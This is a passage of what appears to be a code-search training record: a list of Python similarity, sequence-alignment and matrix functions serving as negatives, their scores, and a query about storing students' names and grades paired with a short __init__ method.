i]\n r[i, i] = np.linalg.norm(u_i)\n q[:, i] = u_i / r[i, i] if r[i, i] != 0 else 0\n q_i = q[:, i]\n\n r[i, i + 1:] = q_i.T.dot(u[:, i + 1:])\n # np.outer will multiply q_i by each number in r[i, i + 1:], and create\n # a matrix that each column is a result of that multiplication\n u[:, i + 1:] -= np.outer(q_i, r[i, i + 1:])\n\n return q, r", "def test_matrix_distance(self):\n # note that the score matrix must contain 'diagonal' elements m[i][i]\n # to avoid failure when the sequences match.\n m = {\"U\": {\"U\": 0, \"C\": 1, \"A\": 5}, \"C\": {\"C\": 0, \"A\": 2, \"G\": 4}}\n self.assertEqual(self.RNA(\"UUUCCC\").matrix_distance(\"UCACGG\", m), 14)\n self.assertEqual(self.RNA(\"UUUCCC\").matrix_distance(\"\", m), 0)\n self.assertEqual(self.RNA(\"UUU\").matrix_distance(\"CAC\", m), 7)\n self.assertRaises(KeyError, self.RNA(\"UUU\").matrix_distance, \"CAG\", m)", "def embedding_similarity(model, validation_pairs):\n scores = dict()\n for pair in validation_pairs:\n author1 = pair[0]\n author2 = pair[1]\n scores[author1 + ' ' +\n author2] = cosine_similarity(model.wv[author1], model.wv[author2])\n return scores", "def levenshteinDistance(s1, s2):\n singleLetterMapping = {DOWNLEFT: '1', DOWN:'2', DOWNRIGHT:'3',\n LEFT:'4', RIGHT:'6',\n UPLEFT:'7', UP:'8', UPRIGHT:'9'}\n\n len1 = len([singleLetterMapping[letter] for letter in s1])\n len2 = len([singleLetterMapping[letter] for letter in s2])\n\n matrix = list(range(len1 + 1)) * (len2 + 1)\n for i in range(len2 + 1):\n matrix[i] = list(range(i, i + len1 + 1))\n for i in range(len2):\n for j in range(len1):\n if s1[j] == 
s2[i]:\n matrix[i+1][j+1] = min(matrix[i+1][j] + 1, matrix[i][j+1] + 1, matrix[i][j])\n else:\n matrix[i+1][j+1] = min(matrix[i+1][j] + 1, matrix[i][j+1] + 1, matrix[i][j] + 1)\n return matrix[len2][len1]", "def similarity(text1, text2):\n\n clean1 = clean(text1)\n clean2 = clean(text2)\n count_meas = src.utils.nlp.prompt_similarity(clean1, clean2, vectorizer=CountVectorizer)\n tfidt_meas = src.utils.nlp.prompt_similarity(clean1, clean2, vectorizer=TfidfVectorizer)\n similarity_dict = {'count': count_meas, 'tfidf': tfidt_meas}\n return similarity_dict", "def jaccard_similarity(string1, string2):\n\n a = set(string1.split())\n b = set(string2.split())\n\n similarity = float(\n len(a.intersection(b)) * 1.0\n / len(a.union(b)))\n\n return similarity", "def calculate_score(result):\n sample1=result['Sample1']\n sample2=result['Sample2']\n string1=paragraph_to_list(sample1)\n string2=paragraph_to_list(sample2)\n \n return round( strings_similarity(string1, string2), 2)\n #method_dict=strings_count_compare(string1, string2)/ max(len(string1), len(string2))\n #return round(0.5*(method_difflab+method_dict), 2)", "def do_semiglobal_alignment(sequences, matrix, penalty):\n seq1 = '-' + sequences[0].Sequence\n seq2 = '-' + sequences[1].Sequence\n\n # scoring matrix initializer\n scoring = local_setup(len(seq1), len(seq2))\n\n # fill scoring matrix\n aa_start = ord('A')\n for i in range(1, len(seq1)):\n aa_x = seq1[i]\n for j in range(1, len(seq2)):\n aa_y = seq2[j]\n xgap = scoring[i][j-1] - penalty\n ygap = scoring[i-1][j] - penalty\n match = scoring[i-1][j-1] + \\\n matrix[ord(aa_x) - aa_start][ord(aa_y) - aa_start]\n\n # store the max score\n scoring[i].append(max([xgap, ygap, match]))\n\n # find the max score (only the last max score)\n max_i, max_j, max_score = 0, 0, -float('inf')\n for j in range(len(scoring[-1])): # find max low road\n if scoring[-1][j] >= max_score:\n max_i, max_j, max_score = -1, j, scoring[-1][j]\n\n for i in range(len(scoring)): # find max high road (priority)\n if scoring[i][-1] >= max_score:\n max_i, max_j, max_score = i, -1, scoring[i][-1]\n\n # perform traceback\n alignment = traceback(\n scoring, seq1, seq2, penalty, matrix, max_i, max_j, semi=True\n )\n\n # add the endgaps for seq1\n if max_i == -1 and max_j != len(scoring[-1]):\n for j in range(max_j + 1, len(scoring[-1])):\n alignment[0][0] += '-'\n alignment[1][0] += ' '\n alignment[2][0] += seq2[j]\n\n # add the endgaps for seq2\n if max_j == -1 and max_i != len(scoring):\n for i in range(max_i + 1, len(scoring)):\n alignment[0][0] += seq1[i]\n alignment[1][0] += ' '\n alignment[2][0] += '-'\n\n # Add the sequences to the scoring matrix for visualizing\n scoring = add_sequences_to_scoring(scoring, seq1, seq2)\n\n return alignment, scoring", "def cosine_similarity(vec_x, vec_y):\n sim_prod = 0.0\n len_x = 0\n len_y = 0\n\n for ngram in vec_x:\n len_x += vec_x[ngram] ** 2\n\n for ngram in vec_y:\n len_y += vec_y[ngram] ** 2\n\n len_x = math.sqrt(len_x)\n len_y = math.sqrt(len_y)\n\n for ngram in vec_x:\n if ngram in vec_y:\n sim_prod += vec_x[ngram] * vec_y[ngram]\n\n return sim_prod / (len_x * len_y)", "def pairwiseScore(seq1, seq2, matrix):\n \n gap = -4.0\n incr_top = 0\n incr_bottom = 0\n pairwise_score = 0\n for i,j in zip(range(len(seq1)), range(len(seq2))):\n aa1 = seq1[i]\n aa2 = seq2[j] \n if aa1==\"-\" and aa2 ==\"-\" :\n pairwise_score += 0\n elif aa1!=\"-\" and aa2!=\"-\":\n pairwise_score += float(matchScore(aa1, aa2, matrix))\n elif aa1==\"-\" and aa2!=\"-\":\n try:\n aa11 = seq1[i+1]\n aa22 = 
seq2[j+1]\n if aa11==\"-\" and aa22!=\"-\":\n incr_top += 1\n else: \n pairwise_score += gap + incr_top * incr_top\n incr_top = 0\n except: \n pairwise_score += gap\n pass\n elif aa1!=\"-\" and aa2==\"-\":\n try:\n aa11 = seq1[i+1]\n aa22 = seq2[j+1]\n if aa11!=\"-\" and aa22==\"-\":\n incr_bottom += 1\n else: \n pairwise_score += gap + incr_bottom * incr_bottom\n incr_bottom = 0\n except: \n pairwise_score += gap\n pass\n else: pass\n \n return pairwise_score", "def similar(text, database):\n # TODO\n pass", "def word_order_similarity(self,sentence_1, sentence_2):\n\t words_1 = sentence_1.getList_of_words()\n\t words_2 = sentence_2.getList_of_words()\n\t joint_words = list(set(words_1).union(set(words_2)))\n\t windex = {x[1]: x[0] for x in enumerate(joint_words)}\n\t r1 = self.word_order_vector(words_1, joint_words, windex)\n\t r2 = self.word_order_vector(words_2, joint_words, windex)\n\t return 1.0 - (np.linalg.norm(r1 - r2) / np.linalg.norm(r1 + r2))", "def test_string_similarity_constraint():\n f = SimilarityConstraint(func=LevenshteinDistance(), pred=GreaterThan(0.5))\n assert f('BROOKLYN', 'BROKLYN')\n assert not f('BROOKLYN', 'QUEENS')", "def strassen(m1, m2):\n \n if ((m1.shape[0] % 2 == 0) or (m1.shape[0] == 1)):\n n = m1.shape[0] \n else:\n n = m1.shape[0] + 1\n result = np.zeros((n, n), dtype = int)\n \n if (n == 1):\n result[0][0] = m1[0][0] * m2[0][0]\n else:\n new = n//2\n \n a11, a12, a21, a22 = m1[:new, :new], m1[new:, :new], m1[:new, new:], m1[new:, new:]\n b11, b12, b21, b22 = m2[:new, :new], m2[new:, :new], m2[:new, new:], m2[new:, new:]\n \n p1 = strassen(a11, b12 - b22)\n p2 = strassen(a11 + a12, b22)\n p3 = strassen(a21 + a22, b11)\n p4 = strassen(a22, b21 - b11)\n p5 = strassen(a11 + a22, b11 + b22)\n p6 = strassen(a12 - a22, b21 + b22)\n p7 = strassen(a11 - a21, b11 + b12)\n \n result[:new, :new] = p5 + p4 - p2 + p6\n result[new:, :new] = p1 + p2\n result[:new, new:] = p3 + p4 \n result[new:, new:] = p5 + p1 - p3 - p7\n \n return result", "def similarity(self, new_sentence):\n cleaned = self.clean_string(new_sentence)\n stemmed = self.stem(cleaned, train=False)\n\n if not set(stemmed).intersection(set(self.vocabulary.keys())):\n return None\n\n else:\n difference = set(stemmed) - set(self.vocabulary.keys())\n to_append = np.zeros((self.matrix.shape[0], len(difference)))\n matrix = np.append(self.matrix, to_append, axis=1)\n\n new_voc = copy.deepcopy(self.vocabulary)\n for word in difference:\n if word not in new_voc:\n new_voc[word] = len(new_voc)\n\n question_vector = self.stem2vec(stemmed, new_voc)\n result = np.matmul(matrix, question_vector)\n return np.argmax(result)", "def _calculate_similarity(self):\n self._logger.info(\"Calculating the similarity between images.\")\n\n # Create a helper function to simplify the loops below:\n def get_wrapper(fdx, mdx):\n wrapper = pos_wrappers.image_similarity_wrapper(\n reference_image=self.f['src_gray'](idx=fdx),\n moving_image=self.f['src_gray'](idx=mdx),\n affine_transformation=self.f['part_transf'](mIdx=mdx, fIdx=fdx))\n return copy.copy(wrapper)\n\n commands = [] # Will hold commands for calculating the similarity\n\n # Will hold (moving, fixed) images partial_transforms basically: all\n # partial transformations array\n partial_transforms = []\n\n self._logger.debug(\"Generating similarity measure warppers.\")\n for moving_slice in self.options.slice_range:\n # Get all fixed images to which given moving slice will be aligned:\n tpair = list(flatten(self._get_slice_pair(moving_slice)))\n\n # Append partial 
transformations for given moving slice to the\n # global partial transformations array\n partial_transforms.append(tpair)\n\n # Generate wrapper for measuring similarity for a given partial\n # transformation.\n for mdx, fdx in tpair:\n commands.append(get_wrapper(fdx, mdx))\n\n # Execute the commands and collect the similarity measurements.\n stdout, stderr = self.execute(commands)\n similarity = map(lambda x: float(x.strip()),\n stdout.strip().split(\"\\n\"))\n similarity = dict(zip(flatten(partial_transforms), similarity))\n\n self._logger.debug(\"Generating graph edges.\")\n graph_connections = []\n\n # Lambda defines whether slice skipping is preferred (lower l), or\n # discouraged (higher)\n l = self.options.graphEdgeLambda\n\n for (mdx, fdx), s in similarity.iteritems():\n w = (1.0 + s) * abs(mdx - fdx) * (1.0 + l) ** (abs(mdx - fdx))\n graph_connections.append((fdx, mdx, w))\n\n self._logger.info(\"Creating a graph based on image similarities.\")\n # Generate the graph based on the weight of the edges\n self.G = nx.DiGraph()\n self.G.add_weighted_edges_from(graph_connections)\n\n self._logger.debug(\"Saving the graph to a file.\")\n # Save the edges for some further analysis.\n nx.write_weighted_edgelist(self.G,\n self.f['graph_edges'](sign=self.signature))\n\n # Also, save the individual similarity metrics:\n simm_fh = open(self.f['similarity'](sign=self.signature), 'w')\n for (mdx, fdx), s in sorted(similarity.iteritems()):\n simm_fh.write(\"%d %d %f\\n\" % (mdx, fdx, s))\n simm_fh.close()", "def scientific_match_ratio(str1, str2, keywords):\n\n # Get rid of the numbers\n str1_numberless = remove_numbers(str1)\n str2_numberless = remove_numbers(str2)\n\n # Get the keywords and whatever remains after removing the keywords\n str1_keywords, str1_remainder = get_common_words_in_description(str1_numberless, keywords)\n str2_keywords, str2_remainder = get_common_words_in_description(str2_numberless, keywords)\n\n remainder_dist = string_num_matches(str1_remainder, str2_remainder)\n common_keywords = str1_keywords.intersection(str2_keywords)\n\n common_keyword_total_len = 0\n for common_kword in common_keywords:\n common_keyword_total_len += len(common_kword)\n\n return (remainder_dist + common_keyword_total_len) * 1.0 / max(len(str1_numberless), len(str2_numberless))", "def test_align():\n target = ('TAAATAAATATCTGGTGTTTGAGGCAAAAAGGCAGACTTAAATTCTAAATCACACCTGTGCTT'\n 'CCAGCACTACCTTCAAGCGCAGGTTCGAGCCAGTCAGGCAGGGTACATAAGAGTCCATTGTGC'\n 'CTGTATTATTTTGAGCAATGGCTAAAGTACCTTCACCCTTGCTCACTGCTCCCCCACTTCCTC'\n 'AAGTCTCATCGTGTTTTTTTTAGAGCTAGTTTCTTAGTCTCATTAGGCTTCAGTCACCAT')\n query = ('TCTGGTGTTTGAGGCAAAAAGGCAGACTTAAATTCTAAATCACACCTGTGCTTCCAGCACTACC'\n 'TTCAAGCGCAGGTTCGAGCCAGTCAGGACTGCTCCCCCACTTCCTCAAGTCTCATCGTGTTTTT'\n 'TTTAGAGCTAGTTTCTTAGTCTCATTAGGCTTCAGTCACCATCATTTCTTATAGGAATACCA')\n assert kevlar.align(target, query) == ('10D91M69D79M20I', 155)", "def compute_alignment_matrix(seq_x,seq_y,scoring_matrix,global_flag):\n \n rows = len(seq_x)\n cols = len(seq_y)\n #if sequences are empty return [[0]]\n if rows == 0 and cols == 0:\n return [[0]]\n \n #initialize the alignment matrix and other variables\n alignment_matrix = [[ 0 for col in range(cols+1)] for row in range(rows+1)]\n value = 0\n \n for row in range(rows+1):\n for col in range(cols+1):\n #for every entry its value is computed \n if row == 0 and col == 0:\n #entry [0,0]\n alignment_matrix[row][col] = 0\n elif row == 0:\n #entry [0,j] is computed based on values [0,j-1] and score of (\"-\" and seq_y[j]) \n value = 
alignment_matrix[row][col-1] + scoring_matrix[\"-\"][seq_y[col-1]]\n elif col == 0:\n #entry [i,0] is computed based on values [i-1,0] and score of (seq_x[i] and \"-\")\n value = alignment_matrix[row-1][col] + scoring_matrix[seq_x[row-1]][\"-\"]\n else:\n #entry [i,j] is computed based of [i-1,j-1],[i,j-1],[i-1,j] as maximum of values\n val1 = alignment_matrix[row-1][col-1] + scoring_matrix[seq_x[row-1]][seq_y[col-1]]\n val2 = alignment_matrix[row-1][col] + scoring_matrix[seq_x[row-1]][\"-\"]\n val3 = alignment_matrix[row][col-1] + scoring_matrix[\"-\"][seq_y[col-1]]\n\n value = max(val1,val2,val3)\n \n if not global_flag:\n #for local alignment negative score is replaced with 0\n value = max(value,0)\n \n alignment_matrix[row][col] = value \n\n return alignment_matrix", "def doc_doc_similarity(matrix_a, matrix_b):\n assert matrix_a.shape[1] == matrix_b.shape[0], \"Mismatched shape between matrix A and matrix B\"\n numerator = np.dot(matrix_a, matrix_b)\n assert numerator.shape == (matrix_a.shape[0], matrix_b.shape[1]), numerator.shape\n denominator = np.sqrt(np.sum(matrix_a ** 2, axis=1))[:, np.newaxis] * np.sqrt(\n np.sum(matrix_b.T ** 2, axis=1))[:, np.newaxis].T\n assert (denominator > 0).all(), \"Denominator is zero {}\".format(denominator)\n similarity_matrix = np.multiply(numerator, 1 / denominator)\n return similarity_matrix", "def damerau_levenshtein_distance(comp_sec):\n s1 = comp_sec['log_trace']\n s2 = comp_sec['sim_trace']\n p1 = comp_sec['proc_log_trace']\n p2 = comp_sec['proc_sim_trace']\n w1 = comp_sec['wait_log_trace']\n w2 = comp_sec['wait_sim_trace']\n d = {}\n lenstr1 = len(s1)\n lenstr2 = len(s2)\n for i in range(-1,lenstr1+1):\n d[(i,-1)] = i+1\n for j in range(-1,lenstr2+1):\n d[(-1,j)] = j+1\n for i in range(0, lenstr1):\n for j in range(0, lenstr2):\n if s1[i] == s2[j]:\n t1 = p1[i] + w1[i]\n if t1 > 0:\n b1 = (p1[i]/t1)\n b2 = (w1[i]/t1)\n cost = (b1*abs(p2[j]-p1[i])) + (b2*abs(w2[j]-w1[i]))\n else:\n cost = 0\n else:\n cost = 1\n d[(i,j)] = min(\n d[(i-1,j)] + 1, # deletion\n d[(i,j-1)] + 1, # insertion\n d[(i-1,j-1)] + cost, # substitution\n )\n if i and j and s1[i]==s2[j-1] and s1[i-1] == s2[j]:\n d[(i,j)] = min (d[(i,j)], d[i-2,j-2] + cost) # transposition\n return d[lenstr1-1,lenstr2-1]", "def evaluate_similarity(kv: KeyedVectors, X, y):\n mean_vector = np.mean(kv.vectors, axis=0, keepdims=True)\n missing_words = np.sum(np.isin(X, kv.index2word, invert=True))\n if missing_words > 0:\n logging.warning(\"Missing {} words. 
Will replace them with mean vector\".format(missing_words))\n get = np.vectorize(gensim_helper.get_vector, signature='(),(),(m)->(m)')\n timer = mytimer.Timer(\"getting vectors for words\")\n wv_x = get(X, kv, mean_vector)\n timer.stop()\n a = wv_x[:, 0]\n b = wv_x[:, 1]\n # timer = mytimer.Timer()\n # a = np_helper.normalize_over_cols_2d(a)\n # b = np_helper.normalize_over_cols_2d(b)\n # scores = np.diag(np.matmul(a, b.T))\n # timer.stop()\n # print(scores.shape)\n #\n # A = np.vstack(kv.get(word, mean_vector) for word in X[:, 0])\n # B = np.vstack(kv.get(word, mean_vector) for word in X[:, 1])\n timer = mytimer.Timer()\n scores = np.array([v1.dot(v2.T) / (np.linalg.norm(v1) * np.linalg.norm(v2)) for v1, v2 in zip(a, b)])\n timer.stop()\n # print(scores.shape)\n return scipy.stats.spearmanr(scores, y)", "def alignment(gram1, gram2):\n # BUG: this loss function causes abnormal optimization behaviors, see\n # comments in past commits\n\n alignment = frobenius_inner_prod(gram1, gram2) /\\\n m.sqrt(frobenius_inner_prod(gram1, gram1) *\n frobenius_inner_prod(gram2, gram2))\n return alignment", "def question7(seq_x, seq_y):\n \n diag_score = 2\n off_diag_score = 1\n dash_score = 0\n alphabet = \"abcdefghijklmnopqrstuvwxyz\"\n score_matrix = student.build_scoring_matrix(alphabet, diag_score, off_diag_score, dash_score)\n \n align_matrix = student.compute_alignment_matrix(seq_x, seq_y, score_matrix, True)\n score, align_x, align_y = student.compute_global_alignment(seq_x, seq_y, score_matrix, align_matrix)\n \n edit_distance = len(seq_x) + len(seq_y) - score\n \n print \"Edit distance: \" + str(edit_distance)\n print align_x\n print align_y", "def find_similars(self, test_set):\n\n tfidf = TfidfVectorizer(lowercase=False, sublinear_tf=True)\n tfidf_matrix = tfidf.fit_transform(self.train_str)\n\n # Calling only transform on test so that idf calculated on train data\n test_str = [' '.join(q.title) for q in test_set]\n test_tfidf = tfidf.transform(test_str)\n\n simis = self.calculate_similarity(tfidf_matrix, test_tfidf)\n return simis", "def compute_local_alignment(seq_x,seq_y,scoring_matrix,alignment_matrix):\n best_score = 0\n len_m, len_n = len(seq_x), len(seq_y)\n best_i = 0\n best_j = 0\n x_ret, y_ret = '', ''\n for idx_i in range(len_m+1):\n for idx_j in range(len_n+1):\n if alignment_matrix[idx_i][idx_j] > best_score:\n best_score = alignment_matrix[idx_i][idx_j]\n best_i = idx_i\n best_j = idx_j\n idx_i = best_i\n idx_j = best_j\n while idx_i != 0 and idx_j != 0:\n if alignment_matrix[idx_i][idx_j] == 0:\n return (best_score, x_ret, y_ret)\n if alignment_matrix[idx_i][idx_j] == (alignment_matrix[idx_i-1][idx_j-1] +\n scoring_matrix[seq_x[idx_i-1]][seq_y[idx_j-1]]):\n # score from diagnoal cell\n x_ret = (seq_x[idx_i-1]) + x_ret\n y_ret = (seq_y[idx_j-1]) + y_ret\n idx_i -= 1\n idx_j -= 1\n elif alignment_matrix[idx_i][idx_j] == (alignment_matrix[idx_i-1][idx_j] +\n scoring_matrix[seq_x[idx_i-1]]['-']):\n # score from above cell\n x_ret = (seq_x[idx_i - 1]) + x_ret\n y_ret = ('-') + y_ret\n idx_i -= 1\n else:\n # score from left cell\n x_ret = ('-') + x_ret\n y_ret = (seq_y[idx_j - 1]) + y_ret\n idx_j -= 1\n while idx_i != 0:\n if alignment_matrix[idx_i][idx_j] == 0:\n return (best_score, x_ret, y_ret)\n\n # idx_j = 0, move upward along first column\n x_ret = (seq_x[idx_i - 1]) + x_ret\n y_ret = ('-') + y_ret\n idx_i -= 1\n while idx_j != 0:\n if alignment_matrix[idx_i][idx_j] == 0:\n return (best_score, x_ret, y_ret)\n\n # idx_i = 0, move left along first row\n x_ret = ('-') + x_ret\n y_ret 
= (seq_y[idx_j - 1]) + y_ret\n idx_j -= 1\n return (best_score, x_ret, y_ret)", "def similarity(a, b):\n distance = Levenshtein.distance(a, b)\n return 1 - (distance / max((len(a), len(b))))", "def score():\n\n # Read files\n s1 = request.form.get(\"string1\")\n s2 = request.form.get(\"string2\")\n if not s1 or not s2:\n abort(400, \"missing strings\")\n\n # Score files\n matrix = distances(s1, s2)\n\n # Extract operations from table\n operations = []\n i, j = len(s1), len(s2)\n while True:\n _, operation = matrix[i][j]\n if not operation:\n break\n if operation == Operation.INSERTED:\n j -= 1\n elif operation == Operation.DELETED:\n i -= 1\n else:\n i -= 1\n j -= 1\n operations.append(operation)\n operations.reverse()\n\n # Maintain list of intermediate strings, operation, and descriptions\n transitions = [(s1, None, None)]\n i = 0\n\n # Apply each operation\n prev = s1\n for operation in operations:\n\n # Update string and description of operation\n if operation == Operation.INSERTED:\n s = (prev[:i], s2[i], prev[i:])\n description = f\"inserted '{s2[i]}'\"\n prev = prev[:i] + s2[i] + prev[i:]\n i += 1\n elif operation == Operation.DELETED:\n s = (prev[:i], prev[i], prev[i + 1:])\n description = f\"deleted '{prev[i]}'\"\n prev = prev[:i] + prev[i + 1:]\n elif prev[i] != s2[i]:\n s = (prev[:i], s2[i], prev[i + 1:])\n description = f\"substituted '{prev[i]}' with '{s2[i]}'\"\n prev = prev[:i] + s2[i] + prev[i + 1:]\n i += 1\n else:\n i += 1\n continue\n transitions.append((s, str(operation), description))\n transitions.append((s2, None, None))\n\n # Output comparison\n return render_template(\"score.html\", matrix=matrix, s1=s1, s2=s2, operations=transitions)", "def sentence_similarity_asym(sentence1, sentence2):\n # Tokenize and tag\n sentence1 = pos_tag(word_tokenize(sentence1))\n sentence2 = pos_tag(word_tokenize(sentence2))\n \n # Get the synsets for the tagged words\n synsets1 = [tagged_to_synset(*tagged_word) for tagged_word in sentence1]\n synsets2 = [tagged_to_synset(*tagged_word) for tagged_word in sentence2]\n \n # Filter out the Nones\n synsets1 = [ss for ss in synsets1 if ss]\n synsets2 = [ss for ss in synsets2 if ss]\n \n score, count = 0.0, 0\n\n # For each word in the first sentence\n for synset in synsets1:\n # Get the similarity value of the most similar word in the other sentence\n pathsim = [synset.path_similarity(ss) for ss in synsets2]\n if len(pathsim) == 0:\n #print sentence1, sentence2\n pathsim = [0]\n best_score = max(pathsim)\n \n # Check that the similarity could have been computed\n if best_score is not None:\n score += best_score\n count += 1\n\n if count == 0:\n return 0\n # Average the values\n score /= count\n return score", "def get_alphabet_similarity_matrix(self):\n distance_matrix = numpy.zeros((len(self.alphabet), len(self.alphabet)))\n numpy.fill_diagonal(distance_matrix, 0)\n for index_one, descriptor_one in enumerate(self.descriptors):\n for index_two, descriptor_two in enumerate(self.descriptors):\n distance = descriptor_one - descriptor_two\n squared_distance = numpy.dot(distance, distance)\n distance_matrix[index_one, index_two] = squared_distance\n distance_matrix /= 2. 
* (self.sigma_amino_acid ** 2)\n return numpy.exp(-distance_matrix)", "def content_similarity(self, movie1, movie2):\n v1, v2 = self.get_tfidf(movie1), self.get_tfidf(movie2)\n return self.cosine_similarity(v1, v2)", "def similarity(self, char1, char2, weights=(1.0, 0.0, 0.0), as_tree=False):\n\n assert char1 in self.char_dict\n assert char2 in self.char_dict\n shape_w, sound_w, freq_w = weights\n\n if char1 in self.char_dict and char2 in self.char_dict:\n\n shape_sim = self.shape_similarity(char1, char2, as_tree=as_tree)\n sound_sim = self.pronunciation_similarity(char1, char2)\n freq_sim = 1.0 - self.char_dict[char2] / len(self.char_dict)\n\n return shape_sim * shape_w + sound_sim * sound_w + freq_sim * freq_w\n else:\n return 0.0", "def do_global_alignment(sequences, matrix, penalty):\n seq1 = '-' + sequences[0].Sequence\n seq2 = '-' + sequences[1].Sequence\n\n # scoring matrix initializer\n scoring = global_setup(len(seq1), len(seq2), penalty)\n\n # fill scoring matrix\n aa_start = ord('A')\n for i in range(1, len(seq1)):\n aa_x = seq1[i]\n for j in range(1, len(seq2)):\n aa_y = seq2[j]\n xgap = scoring[i][j-1] - penalty\n ygap = scoring[i-1][j] - penalty\n match = scoring[i-1][j-1] + \\\n matrix[ord(aa_x) - aa_start][ord(aa_y) - aa_start]\n\n # store the max value of them all\n scoring[i].append(max([xgap, ygap, match]))\n\n # Perform traceback\n alignment = traceback(scoring, seq1, seq2, penalty, matrix)\n # Add the sequences to the scoring matrix for visualizing\n scoring = add_sequences_to_scoring(scoring, seq1, seq2)\n\n return alignment, scoring", "def text_similarity(self, text_1: str, text_2: str):\n txt1 = self._pre_process(text_1)\n txt2 = self._pre_process(text_2)\n\n sim = self.model.wmdistance(txt1, txt2)\n\n if sim == inf:\n sim = INF_SIMILIARITY\n return sim", "def get_subscore_pairwise(seqs1,seqs2, matrix=matrix, gap_s=gap_s, gap_e=gap_e):\n print type(seqs1)\n score=0\n terms=0\n for seq1 in seqs1:\n for seq2 in seqs2:\n score+=get_subscore(seq1, seq2, matrix, gap_s, gap_e)\n terms+=1.0\n\n return score/terms", "def __init__(self,alphabet=\"amino\",dist_function=\"simple\"):\n\n # initialize internal variables\n self.alphabet = alphabet\n self.dist_function = dist_function\n\n # decide on the alphabet\n if self.alphabet == \"amino\": \n self._alphabet_string = \"*ABCDEFGHIKLMNPQRSTVWXYZ\"\n else:\n raise ValueError(\"alphabet not recongized.\")\n \n if self.dist_function == \"simple\":\n self._dist_function_internal = 0\n elif self.dist_function == \"dl\":\n self._dist_function_internal = 1\n else:\n err = \"dist_function not recognized. 
should be 'simple' or 'dl' (Damerau-Levenshtein)\\n\"\n raise ValueError(err)\n \n self.alphabet_size = len(list(self._alphabet_string))\n\n enum_list = zip(self._alphabet_string,range(len(self._alphabet_string)))\n self._alphabet_dict = dict([(a, i) for a, i in enum_list])\n\n tmp_matrix = np.zeros((self.alphabet_size,self.alphabet_size),dtype=int)\n for k1 in self._alphabet_string:\n i = self._alphabet_dict[k1] \n for k2 in self._alphabet_string:\n j = self._alphabet_dict[k2]\n if k1 == k2:\n tmp_matrix[i,j] = 0\n else:\n tmp_matrix[i,j] = 1\n\n self.dist_matrix = tmp_matrix", "def synsets_similarity(s1, s2):\n lemmas_sentence_1, tagged_sentence_1 = lemmatize_sentence(s1.lower())\n lemmas_sentence_2, tagged_sentence_2 = lemmatize_sentence(s2.lower())\n\n # Disambiguate words and create list of sysnsets \n synsets_sentence_1 = []\n for (lemma, word_tag) in zip(lemmas_sentence_1, tagged_sentence_1):\n if lemma in stop_words:\n continue\n synset = lesk(lemmas_sentence_1, lemma, wordnet_pos_code(word_tag[1]))\n if synset is not None:\n synsets_sentence_1.append(synset)\n else:\n found = wordnet.synsets(lemma, wordnet_pos_code(word_tag[1]))\n if len(found) > 0:\n synsets_sentence_1.append(found[0]) \n #print(\"Warn: lemma [%s] returned no disambiguation...using synset : %s\" % (lemma, found[0])) \n\n synsets_sentence_2 = []\n for (lemma, word_tag) in zip(lemmas_sentence_2, tagged_sentence_2):\n if lemma in stop_words:\n continue\n synset = lesk(lemmas_sentence_2, lemma, wordnet_pos_code(word_tag[1]))\n if synset is not None:\n synsets_sentence_2.append(synset)\n else:\n found = wordnet.synsets(lemma, wordnet_pos_code(word_tag[1]))\n if len(found) > 0:\n synsets_sentence_2.append(found[0]) \n #print(\"Warn: lemma [%s] returned no disambiguation...using synset : %s\" % (lemma, found[0])) \n\n # Compute similarity\n if len(synsets_sentence_1) != 0 and len(synsets_sentence_2) != 0:\n similarity = 1 - jaccard_distance(set(synsets_sentence_1), set(synsets_sentence_2))\n return similarity\n else:\n return 0", "def levenshtein_distance(str1, str2):\n m = len(str1)\n n = len(str2)\n lensum = float(m + n)\n d = [] \n for i in range(m+1):\n d.append([i]) \n del d[0][0] \n for j in range(n+1):\n d[0].append(j) \n for j in range(1,n+1):\n for i in range(1,m+1):\n if str1[i-1] == str2[j-1]:\n d[i].insert(j,d[i-1][j-1]) \n else:\n minimum = min(d[i-1][j]+1, d[i][j-1]+1, d[i-1][j-1]+2) \n d[i].insert(j, minimum)\n ldist = d[-1][-1]\n ratio = (lensum - ldist)/lensum\n return {'distance':ldist, 'ratio':ratio}", "def sentence_similarity(sentence1, sentence2):\n sentence1 = sentence1.tags\n sentence2 = sentence2.tags\n \n synsets1 = [tagged_to_synset(*tagged_word) for tagged_word in sentence1]\n synsets2 = [tagged_to_synset(*tagged_word) for tagged_word in sentence2]\n \n synsets1 = [ss for ss in synsets1 if ss]\n synsets2 = [ss for ss in synsets2 if ss]\n \n score, count = 0.0, 0\n \n for synset in synsets1:\n \n li=[synset.path_similarity(ss) for ss in synsets2]\n m=0\n for i in range(len(li)):\n if li[i] is not None and m<li[i]:\n m=li[i]\n if m != 0:\n score += m\n count += 1\n\n if count is 0:\n score = 0\n else:\n score /= count\n return score" ]
[ "0.69739157", "0.647544", "0.6389687", "0.635343", "0.63365984", "0.6257071", "0.62165403", "0.6069753", "0.59501123", "0.5907441", "0.5907441", "0.589913", "0.5876702", "0.5853206", "0.5807996", "0.5804335", "0.5802121", "0.58003086", "0.5793083", "0.5780481", "0.57682025", "0.5763148", "0.57104427", "0.57008636", "0.57003653", "0.56970245", "0.56932807", "0.569313", "0.5681399", "0.5658224", "0.5644576", "0.56228507", "0.5613618", "0.56131804", "0.5606211", "0.55993193", "0.5595516", "0.5590502", "0.5583079", "0.5583079", "0.55773914", "0.5575561", "0.55706626", "0.5567197", "0.5560325", "0.55530894", "0.55462235", "0.5545121", "0.5537103", "0.5534957", "0.5521524", "0.5520564", "0.5515381", "0.5507127", "0.5503352", "0.54988664", "0.548892", "0.548795", "0.5484335", "0.547689", "0.5476755", "0.5473789", "0.5461926", "0.545223", "0.5450873", "0.5450295", "0.5447747", "0.5446465", "0.5444078", "0.5443455", "0.5428454", "0.5422874", "0.5418428", "0.54153836", "0.54069495", "0.54060656", "0.54050624", "0.54017323", "0.5399837", "0.53992873", "0.53962374", "0.5395216", "0.5375639", "0.53696185", "0.53563225", "0.53553677", "0.5348946", "0.534641", "0.53436357", "0.5338696", "0.5337474", "0.5333936", "0.5327961", "0.5324666", "0.53246075", "0.53046036", "0.5298913", "0.52972853", "0.52882254", "0.5283517" ]
0.6120387
7
Store the names and grades of school students.
def __init__(self): self.students = {}
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
